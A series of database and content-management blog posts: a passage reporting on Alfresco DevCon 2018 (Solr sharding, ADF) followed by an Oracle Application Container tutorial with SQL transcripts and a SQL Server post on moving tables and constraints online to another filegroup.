  • MOD_ACL_ID (ACL v1) => Sharding based on ACL. If all documents have the same ACL (same site for example), then they will all be on the same Shard, which might not be very useful…
  • ACL_ID (ACL v2) => Same as v1 except that it uses the murmur hash of the ACL ID and not its modulus
  • DB_ID (DB ID) => Default in Solr6. Nodes are evenly distributed on the Shards based on their DB ID
  • DB_ID_RANGE (DB ID Range) => You can define the DB ID range for which nodes will go to which Shard (E.g.: 1 to 10M => Shard-0 / 10M to 20M => Shard-1 / aso…)
  • DATE (Date and Time) => Assign date for each Shards based on the month. It is possible to group some months together and assign a group per Shard
  • PROPERTY (Metadata) => The value of some property is hashed and this hash is used for the assignment to a Shard so all nodes with the same value are in the same Shard
  • EXPLICIT (?) => This is an all-new method that isn’t yet in the documentation… Since there isn’t any information about this except in the source code, I asked Jose to provide me some information about what it does. He’ll look at the source code and I will update this blog post as soon as I receive some information!

Unfortunately, the Solr Sharding has only been available starting with Alfresco Content Services 5.1 (Solr 4) and only using the ACL v1 method. New methods were then added using the Alfresco Search Services (Solr 6). The availability of methods VS Alfresco/Solr versions has been summarized in Jose’s presentation:

[Slide: Sharding methods availability per Alfresco/Solr version]

Jose also shared a comparison matrix of the different methods to choose the right one for each use case:

[Slide: comparison matrix of the Sharding methods]

Some other best practices regarding the Solr Sharding:

  • Replicate the Shards to increase response time; it also provides High Availability so… no reason not to!
  • Backup the Shards using the provided Web Service so Alfresco can do it for you for one or several Shards
  • Use DB_ID_RANGE if you want to be able to add Shards without having to perform a full reindex, this is the only way
  • If you need another method than DB_ID_RANGE, then plan carefully the number of Shards to be created. You might want to overshard to take into account the future growth
  • Keep in mind that each Shard will pull the changes from Alfresco every 15s and it all goes to the DB… It might create some load there and therefore be sure that your DB can handle that
  • As far as I know, at the moment, the Sharding does not support Solr in SSL. Solr should anyway be protected from external accesses because it is only used by Alfresco internally so this is an ugly point so far but it’s not too bad. Sharding is pretty new so it will probably support the SSL at some point in the future
  • Tune properly Solr and don’t forget the Application Server request header size
    • Solr4 => Tomcat => maxHttpHeaderSize=…
    • Solr6 => Jetty => solr.jetty.request.header.size=…

 

The day-2 started with a session from John Newton who presented the impact of emerging technologies on content. As usual, John’s presentation had a funny theme incorporated in the slides and this time it was Star Wars.

[Slide: Star Wars themed keynote slide]

 

After that, I attended the Hack-a-thon showcase, presented/introduced by Axel Faust. In the Alfresco world, Hack-a-thons are:

  • Around since 2012
  • Open-minded and all about collaboration. Therefore, the output of any project is open source and available for the community. It’s not about money!
  • Always the source of great add-ons and ideas
  • 2 times per year
    • During conferences (day-0)
    • Virtual Hack-a-thon (36h ‘follow-the-sun’ principle)

A few of the 16 teams that participated in the Hack-a-thon presented the result of their Hack-a-thon day and there were really interesting results for ACS, ACS on AWS, APS, aso…

Apart from that, I also attended all the lightning talks on day-2 as well as presentations on PostgreSQL and Solr HA/backup solutions and best practices. The presentations about PostgreSQL and Solr were interesting, especially for newcomers, because they really explained what should be done to have a highly available and resilient Alfresco environment.

 

There were too many lightning talks to mention them all but, as always, some were quite interesting and I just need to mention the talk about the ContentCraft plugin (from Roy Wetherall). There cannot be an Alfresco event (be it a Virtual Hack-a-thon, BeeCon or DevCon now) without an Alfresco integration into Minecraft. Every year, Roy keeps adding new stuff to his plugin… I remember, years ago, Roy was already able to create a building in Minecraft where the height represented the number of folders stored in Alfresco and the depth was the number of documents inside, if my memory is correct (this changed now, it represents the number of sub-folders). This year, Roy presented the new version and it’s even more incredible! Now if you are in front of one of the building’s doors, you can see the name and creator of the folder on a ‘Minecraft sign’. Then you can walk in the building and there is a corridor. On both sides, there are rooms which represent the sub-folders. Again, there are ‘Minecraft signs’ there with the name and creator of the sub-folders. Until then, it’s just the same thing again so that’s cool but it gets even better!

If you walk in a room, you will see ‘Minecraft bookshelves’ and ‘Minecraft chests’. Bookshelves are just there for the decoration but if you open the chests, then you will see, represented by ‘Minecraft books’, all your Alfresco documents stored on this sub-folder! Then if you open a book, you will see the content of this Alfresco document! And even crazier, if you update the content of the book on Minecraft and save it, the document stored in Alfresco will reflect this change! This is way too funny :D.

It’s all done using CMIS so there is nothing magical… Yet it really makes you wonder if there are any limits to what Alfresco can do ;).

 

If I dare to say: long live Alfresco! And see you around again for the next DevCon.

 

 


Alfresco DevCon 2018 – Day 1 – ADF, ADF and… ADF!

Wed, 2018-01-17 13:30

Here we are, the Alfresco DevCon 2018 day-1 is over (well, except for the social party)! It’s already been 2 years since I attended my last Alfresco event (BeeCon 2016, first of its name, organized by the Order of the Bee) because I wasn’t able to attend the second BeeCon (2017) since it happened on the exact dates of our internal dbi xChange event. Yesterday was the DevCon 2018 day-0 with the Hackathon, the full day training and the ACSCE/APSCE certification preparation but today was really the first day of sessions.

[Image: Alfresco DevCon 2018 logo]

 

The day-1 started, as usual, with a keynote from Thomas DeMeo who presented interesting information regarding the global direction of Alfresco products, the roadmap (of course) for the coming year, as well as some use cases where Alfresco was successfully used in very interesting projects, also including AWS.

[Slide: Alfresco product roadmap]

 

The second part of the keynote was presented by Brian Remmington, who explained the future of the Alfresco Digital Platform. In the coming months/years, Alfresco will include/refactor/work on the following points for its Digital Platform:

  • Improve SSO solutions. Kerberos is already working very well with Alfresco but they intend to also add SAML2, OAuth, aso… This is a very good thing!
  • Merging the Identity management for the ACS and APS into one single unit
  • Adding an API Gateway in front of ACS and APS to always talk to the same component and targeting in the background both the ACS and APS. It will also allow Alfresco to change the backend APIs, if needed (to align them for example), without the API Gateway noticing it. This is a very good thing too from a developer perspective since you will be sure that your code will not break if Alfresco rename something for example!
  • Merging the search on the ACS and APS into one single search index
  • We already knew it but it was confirmed that Alfresco [will probably drop the default installer and instead] will provide docker/kubernetes means for you to deploy Alfresco easily and quickly using these new technologies
  • Finishing the merge/refactor of other ACS/APS services into common units for both products so that work done once isn’t duplicated. This will concern the Search (Insight?) Service, the Transformation Service, the Form Service and a new Function Service (basically code functions shared between ACS and APS!).

All this looks promising, like really.

 

Then, starting at 10am, there were four streams running in parallel, so there is something that you will find interesting, that’s for sure. I didn’t mention it but DevCon isn’t just a name… It means that the sessions are really technical; we are far from the (boring) business presentations that you can find at all other competitors’ events… I did a full morning on ADF. Mario Romano and Ole Hejlskov were presenting ADF Basics and Beyond.

For those of you who don’t know it yet, ADF (Alfresco Development Framework) is the last piece of the Digital Platform that Alfresco has been bringing recently. It is a very interesting new framework that allows you to create your own UI to use in front of ACS/APS. There are at the moment more than 100 Angular components that you can use, extend, compose and configure to build the UI that will match your use case. Alfresco Share still provides way more features than ADF but I must say that I’m pretty impressed by what you can achieve in ADF with very little: it looks like it is going in the right direction.

ADF 2.0 has been released recently (November 2017) and it is based on three main pillars: the latest version of Angular 5, a powerful JavaScript API (that talks in the background with the ACS/APS/AGS APIs) and the Yeoman generator + Angular CLI for fast deployments.

ADF provides 3 extension points for you to customize a component:

  • html extension points => adding html to customize the look&feel or the behavior
  • event listeners => adding behaviors on events for example
  • config properties => each component has properties that will customize it

One of the goals of ADF is the ability to upgrade your application without any effort. Angular components will be updated in the future but ADF was designed (and Alfresco’s effort is going) in a way that even if you use these components in your ADF application, an upgrade of your application won’t hurt at all. If you want to learn more about ADF, then I suggest the Alfresco Tech Talk Live that took place in December as well as the Alfresco Office Hours.

 

After this first introduction session to ADF, Eugenio Romano went deeper and showed how to play with ADF 2.0: installing it, deploying a first application and then customizing the main pieces like the theme, the document list, the actions, the search, aso… There were some really interesting examples and I’m really looking forward to seeing the tutorials and documentation popping up on the Alfresco website about these ADF 2.0 new features and components.

 

To conclude the morning, Denys Vuika presented a session about how to use and extend the Alfresco Content App (ACA). The ACA is the new ADF 2.0 application provided by Alfresco. It is a demo/sample application whose purpose is to be lightweight so it is as fast as possible. You can then customize it as you want and play with the ADF so that this sample application matches your needs. One of the demos Denys presented is how you can change the default previewer for certain types of files (.txt, .js, .xml for example). In ADF, that’s like 5 lines of code (of course you need to have another previewer of your own but that’s not ADF stuff) and then he had an awesome preview for .js files with syntax highlighting right inside the Alfresco preview as well as tooltips on names to give descriptions of variables and functions apparently. This kind of small feature, done so easily, looks quite promising.

 

I already wrote a lot on ADF today so I will stop my blog here, but I did attend a lot of other very interesting sessions in the afternoon. I might talk about that tomorrow.

 

 

 


Oracle Application Container: a Swiss Use case

Tue, 2018-01-16 17:11

Here we want to start a business in Switzerland in 3 different market areas and make it easy to open a new market area as soon as the business requires it. We are going to use the Application Container feature in order to:

  • Have a dedicated PDB for each market with shared and local metadata and data
  • Frequently roll out data model and code changes to add features, in a central manner, with one command

We first have to create a master application container; you can have many master application containers within a CDB. We will also create a seed PDB from that master application container. This is not mandatory: its role is to keep a synchronized copy of the master and to speed up the provisioning of new pluggable databases within the master container.

SQL> create pluggable database B2C_WEB_CON as application container admin user pdbadmin identified by secret roles = (DBA) ;

Pluggable database B2C_WEB_CON created.

SQL> alter pluggable database B2C_WEB_CON open;

Pluggable database B2C_WEB_CON altered.

SQL> alter session set container = B2C_WEB_CON ;

Session altered.

SQL> create pluggable database as seed admin user pdbadmin identified by oracle roles=(DBA)  ;

Pluggable database AS created.

SQL> alter pluggable database B2C_WEB_CON$SEED open;

Pluggable database B2C_WEB_CON$SEED altered.

SQL> select PDB_ID, PDB_NAME, STATUS, IS_PROXY_PDB, APPLICATION_ROOT, APPLICATION_PDB, APPLICATION_SEED, APPLICATION_ROOT_CON_ID from dba_pdbs order by 1;
  PDB_ID PDB_NAME           STATUS   IS_PROXY_PDB   APPLICATION_ROOT   APPLICATION_PDB   APPLICATION_SEED     APPLICATION_ROOT_CON_ID
       4 B2C_WEB_CON        NORMAL   NO             YES                NO                NO
       5 B2C_WEB_CON$SEED   NORMAL   NO             NO                 YES               YES                                        4

 

I will now create an application from zero. An application is a set of commands executed in the master application container, on which a version tag is applied. In other words, Oracle records what happens in the master container and applies a version flag on those commands to replay them in future PDBs.
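Note that the application capture has to be started explicitly before running the application DDL. The transcript below jumps straight to the object creation, so something along these lines was presumably run first (the tablespace statement is an assumption and relies on OMF being configured; the version matches the 'end install' further down):

SQL> alter pluggable database application B2C_WEB_APP begin install '1.0';
SQL> create tablespace TBS_B2C_WEB datafile size 100M;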

SQL> connect sys/oracle@//localhost:1521/B2C_WEB_CON as sysdba
Connected.

SQL> create user USR_B2C_WEB identified by secret quota unlimited on TBS_B2C_WEB ;

User USR_B2C_WEB created.

SQL> alter user USR_B2C_WEB default tablespace TBS_B2C_WEB ;

User USR_B2C_WEB altered.

SQL> grant create session, resource to USR_B2C_WEB ;

Grant succeeded.

SQL> alter session set current_schema = USR_B2C_WEB ;

Session altered.

SQL> create table customers ( customer_id number, name varchar2(50), address varchar2(50) ) ;

Table CUSTOMERS created.

SQL> create table orders ( order_id number, customer_id number, order_date date ) ;

Table ORDERS created.

SQL> create table order_details ( order_detail_id number, order_id number, product_id number, quantity number ) ;

Table ORDER_DETAILS created.

SQL> create table products ( product_id number, name varchar2(50) ) ;

Table PRODUCTS created.

SQL> alter pluggable database application B2C_WEB_APP end install '1.0';

Pluggable database APPLICATION altered.

SQL> select * from dba_applications;
APP_NAME                                 APP_ID APP_VERSION   APP_STATUS   APP_IMPLICIT   APP_CAPTURE_SERVICE   APP_CAPTURE_MODULE
APP$62EA42BE47360FA8E0537A38A8C0A0F3          2 1.0           NORMAL       Y              SYS$USERS             java@VM122 (TNS V1-V3)
B2C_WEB_APP                                   3 1.0           NORMAL       N              b2c_web_con           java@VM122 (TNS V1-V3)

 

We can now synchronize the application B2C_WEB_APP from the MASTER to the SEED in order to speed up the next pluggable database creations.

SQL> connect sys/oracle@//localhost:1521/B2C_WEB_CON$SEED as sysdba

Session altered.

SQL> alter pluggable database application B2C_WEB_APP sync ;

 

Then, go to the master and create your pluggable database for each market with the latest B2C_WEB_APP application release which is currently 1.0

SQL> connect pdbadmin/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> create pluggable database B2C_WEB_APP_VD admin user pdbadmin identified by secret roles=(DBA) ;

Pluggable database B2C_WEB_APP_VD created.

SQL> create pluggable database B2C_WEB_APP_GE admin user pdbadmin identified by secret roles=(DBA) ;

Pluggable database B2C_WEB_APP_GE created.

SQL> create pluggable database B2C_WEB_APP_ZH admin user pdbadmin identified by secret roles=(DBA) ;

Pluggable database B2C_WEB_APP_ZH created.

 

We open them and save the state to have them opened automatically at the next CDB restart.

SQL> connect sys/oracle@//localhost:1521/B2C_WEB_CON as sysdba
Connected.

SQL> alter pluggable database all open ;

Pluggable database ALL altered.

SQL> alter pluggable database save state ;

Pluggable database SAVE altered.

 

Let’s generate some business activity on each pluggable database corresponding to different Swiss markets

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_APP_VD
Connected.
SQL> insert into usr_b2c_web.products select rownum, 'product_VD_00'||rownum from dual connect by level <= 5 ;

5 rows inserted.

SQL> commit ;

Commit complete.

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_APP_GE
Connected.

SQL> insert into usr_b2c_web.products select rownum, 'product_GE_00'||rownum from dual connect by level <= 5 ;

5 rows inserted.

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_APP_ZH
Connected.

SQL> insert into usr_b2c_web.products select rownum, 'product_ZH_00'||rownum from dual connect by level <= 5 ;

5 rows inserted.

SQL> commit;

Commit complete.

 

Now we can check from the master container whether the data is correctly located according to its market.

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> select con$name, p.*
  2  from containers ( PRODUCTS ) p ;
CON$NAME           PRODUCT_ID NAME               CON_ID
B2C_WEB_APP_ZH              1 product_ZH_001          7
B2C_WEB_APP_ZH              2 product_ZH_002          7
B2C_WEB_APP_ZH              3 product_ZH_003          7
B2C_WEB_APP_ZH              4 product_ZH_004          7
B2C_WEB_APP_ZH              5 product_ZH_005          7
B2C_WEB_APP_GE              1 product_GE_001          6
B2C_WEB_APP_GE              2 product_GE_002          6
B2C_WEB_APP_GE              3 product_GE_003          6
B2C_WEB_APP_GE              4 product_GE_004          6
B2C_WEB_APP_GE              5 product_GE_005          6
B2C_WEB_APP_VD              1 product_VD_001          3
B2C_WEB_APP_VD              2 product_VD_002          3
B2C_WEB_APP_VD              3 product_VD_003          3
B2C_WEB_APP_VD              4 product_VD_004          3
B2C_WEB_APP_VD              5 product_VD_005          3

 

We have different products for each of our markets. Now, we would like to upgrade the data model and add some code (a procedure) to provide a basic feature: adding a customer.

SQL> connect pdbadmin/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> alter pluggable database application B2C_WEB_APP begin upgrade '1.0' to '1.1';

Pluggable database APPLICATION altered.

SQL> alter session set current_schema = USR_B2C_WEB ;

Session altered.

SQL> alter table customers drop ( address ) ;

Table CUSTOMERS altered.

SQL> alter table customers add ( email varchar2(35) ) ;

Table CUSTOMERS altered.

SQL> alter table products add ( price number (8, 2) ) ;

Table PRODUCTS altered.

SQL> create sequence customer_seq ;

Sequence CUSTOMER_SEQ created.

SQL> create procedure customer_add ( name in varchar2, email in varchar2 ) as
  2  begin
  3    insert into customers values ( customer_seq.nextval, name, email ) ;
  4    commit ;
  5  end;
  6  /

Procedure CUSTOMER_ADD compiled

SQL> alter pluggable database application B2C_WEB_APP end upgrade to '1.1';

Pluggable database APPLICATION altered.

 

Let’s push release 1.1 to production, one market after the other:

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_VD
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync ;

Pluggable database APPLICATION altered.

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_GE
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync ;

Pluggable database APPLICATION altered.

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_ZH
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync ;

Pluggable database APPLICATION altered.

 

Some business activity happens and new customers are going to appear thanks to the new feature we deployed in release 1.1 of our B2C_WEB_APP application:

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_APP_VD
Connected.

SQL> exec customer_add ('Scotty Hertz', 'SCOTTY@GMAIL.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Scotty Hertz', 'SCOTTY@GMAIL.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Smith Watson', 'SMITH@YAHOO.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('John Curt', 'JOHN@GMAIL.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Dalton X', 'DALTON@AOL.COM') ;

PL/SQL procedure successfully completed.

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_APP_GE
Connected.

SQL> exec customer_add ('Scotty Hertz', 'SCOTTY@GMAIL.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Sandeep John', 'SANDEEP@YAHOO.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Smith Curt', 'SMITH@YAHOO.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Orlondo Watson', 'ORLONDO@GMAIL.COM') ;

PL/SQL procedure successfully completed.

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_APP_ZH
Connected.

SQL> exec customer_add ('Maria Smith', 'MARIA@GMAIL.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Smith Scotty', 'SMITH@YAHOO.COM') ;

PL/SQL procedure successfully completed.

 

Now, let’s have a look at the new customer data from the master container:

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> select con$name, c.*
  2  from containers ( CUSTOMERS ) c ;
CON$NAME           CUSTOMER_ID NAME             EMAIL                 CON_ID
B2C_WEB_APP_VD               1 Scotty Hertz     SCOTTY@GMAIL.COM           3
B2C_WEB_APP_VD               2 Scotty Hertz     SCOTTY@GMAIL.COM           3
B2C_WEB_APP_VD               3 Smith Watson     SMITH@YAHOO.COM            3
B2C_WEB_APP_VD               4 John Curt        JOHN@GMAIL.COM             3
B2C_WEB_APP_VD               5 Dalton X         DALTON@AOL.COM             3
B2C_WEB_APP_GE               1 Scotty Hertz     SCOTTY@GMAIL.COM           6
B2C_WEB_APP_GE               2 Sandeep John     SANDEEP@YAHOO.COM          6
B2C_WEB_APP_GE               3 Smith Curt       SMITH@YAHOO.COM            6
B2C_WEB_APP_GE               4 Orlondo Watson   ORLONDO@GMAIL.COM          6
B2C_WEB_APP_ZH               1 Maria Smith      MARIA@GMAIL.COM            7
B2C_WEB_APP_ZH               2 Smith Scotty     SMITH@YAHOO.COM            7


11 rows selected.

 

As we don’t like the email format because it’s ugly in the web interface, we are now going to release a “data” patch on top of release 1.1 in order to format the customers’ emails in a proper manner.

SQL> connect pdbadmin/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> alter pluggable database application B2C_WEB_APP begin patch 1 minimum version '1.1' ;

Pluggable database APPLICATION altered.

SQL> update usr_b2c_web.customers set email = trim(lower(email)) ;

0 rows updated.

SQL> alter pluggable database application B2C_WEB_APP end patch 1 ;

Pluggable database APPLICATION altered.

SQL> select * from dba_app_patches;
APP_NAME        PATCH_NUMBER PATCH_MIN_VERSION   PATCH_STATUS   PATCH_COMMENT
B2C_WEB_APP                1 1.1                 INSTALLED

 

As we now have a patch ready to clean up the email format, we can deploy it on each market

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_VD
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync;

Pluggable database APPLICATION altered.

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_GE
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync;

Pluggable database APPLICATION altered.

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_ZH
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync;

Pluggable database APPLICATION altered.

 

Let's check that the data patch has been applied successfully and that the email format is now correct for all markets

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> select con$name, c.*
  2  from containers ( CUSTOMERS ) c ;
CON$NAME           CUSTOMER_ID NAME             EMAIL                 CON_ID
B2C_WEB_APP_VD               1 Scotty Hertz     scotty@gmail.com           3
B2C_WEB_APP_VD               2 Scotty Hertz     scotty@gmail.com           3
B2C_WEB_APP_VD               3 Smith Watson     smith@yahoo.com            3
B2C_WEB_APP_VD               4 John Curt        john@gmail.com             3
B2C_WEB_APP_VD               5 Dalton X         dalton@aol.com             3
B2C_WEB_APP_ZH               1 Maria Smith      maria@gmail.com            7
B2C_WEB_APP_ZH               2 Smith Scotty     smith@yahoo.com            7
B2C_WEB_APP_GE               1 Scotty Hertz     scotty@gmail.com           6
B2C_WEB_APP_GE               2 Sandeep John     sandeep@yahoo.com          6
B2C_WEB_APP_GE               3 Smith Curt       smith@yahoo.com            6
B2C_WEB_APP_GE               4 Orlondo Watson   orlondo@gmail.com          6


11 rows selected.

 

The business has now requested a new feature. We need an upgrade of the application to add a parameters table that will contain USR_B2C_WEB application parameters which must be shared across all application PDBs. In addition, each market wants to be able to add its own parameters without impacting the existing ones or the other markets.
We are going to use the "SHARING" attribute set to "EXTENDED DATA" for that table, which makes it possible to mix shared data stored in the master with local PDB data in the same table (a deeper explanation and the other sharing modes are described here).
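
For reference, here is a minimal sketch of the other sharing modes (hypothetical tables, not part of this demo; like any application object, they would have to be created in the application root between BEGIN and END install/upgrade statements):

-- SHARING = METADATA (the default): only the table definition is shared, each application PDB stores its own rows
create table usr_b2c_web.local_prefs sharing = metadata ( name varchar2(50), value varchar2(50) );

-- SHARING = DATA: definition and rows live in the application root; application PDBs see the shared rows but cannot add local ones
create table usr_b2c_web.country_codes sharing = data ( code varchar2(10), label varchar2(50) );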

SQL> connect pdbadmin/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> alter pluggable database application B2C_WEB_APP begin upgrade '1.1' to '1.2';

Pluggable database APPLICATION altered.

SQL> create table usr_b2c_web.settings sharing = extended data ( name varchar2(50), value varchar2(50) );

Table USR_B2C_WEB.SETTINGS created.

SQL> insert into usr_b2c_web.settings values ( 'compagny_name', 'wisdom IT' ) ;

1 row inserted.

SQL> insert into usr_b2c_web.settings values ( 'head_quarter_address', 'street village 34, 3819 Happiness, Switzerland' ) ;

1 row inserted.

SQL> commit ;

Commit complete.

SQL> alter pluggable database application B2C_WEB_APP end upgrade to '1.2';

Pluggable database APPLICATION altered.

 

Upgrade to 1.2 for all markets and addition of a local "market_name" parameter for each market

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_VD
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync;

Pluggable database APPLICATION altered.

SQL> insert into usr_b2c_web.settings values ( 'market_name', 'VAUD' ) ;

1 row inserted.

SQL> commit ;

Commit complete.

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_GE
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync;

Pluggable database APPLICATION altered.

SQL> insert into usr_b2c_web.settings values ( 'market_name', 'GENEVA' ) ;

1 row inserted.

SQL> commit ;

Commit complete.

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_ZH
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync;

Pluggable database APPLICATION altered.

SQL> insert into usr_b2c_web.settings values ( 'market_name', 'ZURICH' ) ;

1 row inserted.

SQL> commit ;

Commit complete.

 

Now let's check that the shared parameters are available for all markets and that each of them has its own dedicated "market_name" value

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> select con$name, c.*
  2  from containers ( SETTINGS ) c ;

CON$NAME         NAME                   VALUE                                              CON_ID
B2C_WEB_CON      compagny_name          wisdom IT                                               4
B2C_WEB_CON      head_quarter_address   street village 34, 3819 Happiness, Switzerland          4
B2C_WEB_APP_GE   compagny_name          wisdom IT                                               6
B2C_WEB_APP_GE   head_quarter_address   street village 34, 3819 Happiness, Switzerland          6
B2C_WEB_APP_GE   market_name            GENEVA                                                  6
B2C_WEB_APP_VD   compagny_name          wisdom IT                                               3
B2C_WEB_APP_VD   head_quarter_address   street village 34, 3819 Happiness, Switzerland          3
B2C_WEB_APP_VD   market_name            VAUD                                                    3
B2C_WEB_APP_ZH   compagny_name          wisdom IT                                               7
B2C_WEB_APP_ZH   head_quarter_address   street village 34, 3819 Happiness, Switzerland          7
B2C_WEB_APP_ZH   market_name            ZURICH                                                  7

 

Looks all good.

Now the business needs to extend the startup activity to a new market area of Switzerland. We are therefore going to add a new pluggable database for that market. This market will immediately benefit from the latest application release.

SQL> alter session set container = B2C_WEB_CON ;

Session altered.

SQL> create pluggable database B2C_WEB_APP_ZG admin user pdbadmin identified by secret roles=(DBA) ;

Pluggable database B2C_WEB_APP_ZG created.

SQL> alter pluggable database B2C_WEB_APP_ZG open;

Pluggable database B2C_WEB_APP_ZG altered.

 

Let's check with the parameters table whether all the data has been synchronized to the new PDB

SQL> select con$name, c.*
  2  from containers ( SETTINGS ) c ;
CON$NAME         NAME                   VALUE                                              CON_ID
B2C_WEB_APP_VD   compagny_name          wisdom IT                                               3
B2C_WEB_APP_VD   head_quarter_address   street village 34, 3819 Happiness, Switzerland          3
B2C_WEB_APP_VD   market_name            VAUD                                                    3
B2C_WEB_CON      compagny_name          wisdom IT                                               4
B2C_WEB_CON      head_quarter_address   street village 34, 3819 Happiness, Switzerland          4
B2C_WEB_APP_GE   compagny_name          wisdom IT                                               6
B2C_WEB_APP_GE   head_quarter_address   street village 34, 3819 Happiness, Switzerland          6
B2C_WEB_APP_GE   market_name            GENEVA                                                  6
B2C_WEB_APP_ZH   compagny_name          wisdom IT                                               7
B2C_WEB_APP_ZH   head_quarter_address   street village 34, 3819 Happiness, Switzerland          7
B2C_WEB_APP_ZH   market_name            ZURICH                                                  7
B2C_WEB_APP_ZG   compagny_name          wisdom IT                                               5
B2C_WEB_APP_ZG   head_quarter_address   street village 34, 3819 Happiness, Switzerland          5

 

I hope this post helps you understand how to implement Application Containers in real life. Please do not hesitate to contact us if you have any questions or require further information.

 

The post Oracle Application Container: a Swiss Use case appeared first on Blog dbi services.

Moving tables ONLINE on filegroup with constraints and LOB data

Mon, 2018-01-15 00:20

Let's start this new week by going back to a discussion I had with one of my customers a couple of days ago about moving several tables into different filegroups. Let's say that some of them contained LOB data. Let's add another customer requirement to the game: moving all of them ONLINE to avoid impacting data availability during the migration process. The concerned tables had schema constraints such as primary and foreign keys, as well as non-clustered indexes. So, a pretty common schema we may deal with daily at customer shops.

Firstly, the discussion didn't focus on moving non-clustered indexes to a different filegroup (pretty well known to my customer) but on how to move constraints online without integrity issues. The main reason for that came from different pointers my customer had found on the internet, where the constraints are first dropped and then recreated (by using the MOVE TO clause), and that's why he was not very confident about moving such constraints without introducing integrity issues.

Let's illustrate this scenario with the following demonstration. I will use a dbo.bigTransactionHistory2 table that I want to move ONLINE from the PRIMARY to the FG1 filegroup. There is a primary key constraint on the TransactionID column as well as a foreign key on the ProductID column that refers to the dbo.bigProduct table and its ProductID column.

EXEC sp_helpconstraint 'dbo.bigTransactionHistory2';

blog 125 - 1 - bigTransactionHistory2 PK FK

Here a picture of indexes existing on the dbo.bigTransactionHistory2 table:

EXEC sp_helpindex 'dbo.bigTransactionHistory2';

blog 125 - 2 - bigTransactionHistory2 indexes

Let's say that the pk_bigTransactionHistory_TransactionID unique clustered index is tied to the primary key constraint.

Let's start with the first approach, based on the MOVE TO clause.

ALTER TABLE dbo.bigTransactionHistory2 DROP CONSTRAINT pk_bigTransactionHistory_TransactionID WITH (MOVE TO FG1, ONLINE = ON);

--> at this point there is no constraint to prevent duplicate entries

ALTER TABLE dbo.bigTransactionHistory2 ADD CONSTRAINT pk_bigTransactionHistory_TransactionID PRIMARY KEY(TransactionDate, TransactionID)
WITH (ONLINE = ON);

By looking further at the script performed, we may quickly figure out that this approach may introduce duplicate entries between the drop constraint step (which also moves the table to the FG1 filegroup) and the create constraint step.

We might address this issue by encapsulating the above commands within a transaction. But obviously this method has a cost: we have a good chance of creating a long blocking scenario – depending on the amount of data – leading temporarily to data unavailability. The second drawback concerns performance. Indeed, we first drop the primary key constraint, meaning we drop the underlying clustered index structure in the background. Going this way also implies rebuilding the related non-clustered indexes to update their leaf level with row ids, and rebuilding them again when re-adding the primary key constraint in the second step.
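
For completeness, such a transactional variant could look like the sketch below (same table and filegroup names as above; it was not used here precisely because of the blocking it introduces):

BEGIN TRANSACTION;

ALTER TABLE dbo.bigTransactionHistory2
    DROP CONSTRAINT pk_bigTransactionHistory_TransactionID WITH (MOVE TO FG1, ONLINE = ON);

ALTER TABLE dbo.bigTransactionHistory2
    ADD CONSTRAINT pk_bigTransactionHistory_TransactionID
    PRIMARY KEY (TransactionDate, TransactionID)
    WITH (ONLINE = ON) ON [FG1];

-- schema modification locks taken by both DDL statements are held until COMMIT,
-- so no duplicate can slip in, but the table stays blocked for the whole duration
COMMIT TRANSACTION;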

From my point of view there is a better way to go through if we want all the steps to be performed efficiently and ONLINE including the guarantee that constraints will continue to ensure checks during all the moving process.

Firstly, let's move the primary key by using a one-step command (the same applies to UNIQUE constraints). In fact, moving such a constraint only requires rebuilding the corresponding index with the DROP_EXISTING and ONLINE options, which preserves the constraint functionality. In this case, my non-clustered indexes are not touched by the operation because we don't have to update their leaf level as with the previous method.

CREATE UNIQUE CLUSTERED INDEX pk_bigTransactionHistory_TransactionID
ON dbo.bigTransactionHistory2 ( [TransactionDate] ASC, [TransactionID] ASC )
WITH (ONLINE = ON, DROP_EXISTING = ON)
ON [FG1];

In addition, the good news is that if we try to introduce a duplicate key while the index is being rebuilt on the FG1 filegroup, we face the following error as expected:

Msg 2627, Level 14, State 1, Line 3
Violation of PRIMARY KEY constraint ‘pk_bigTransactionHistory_TransactionID’.
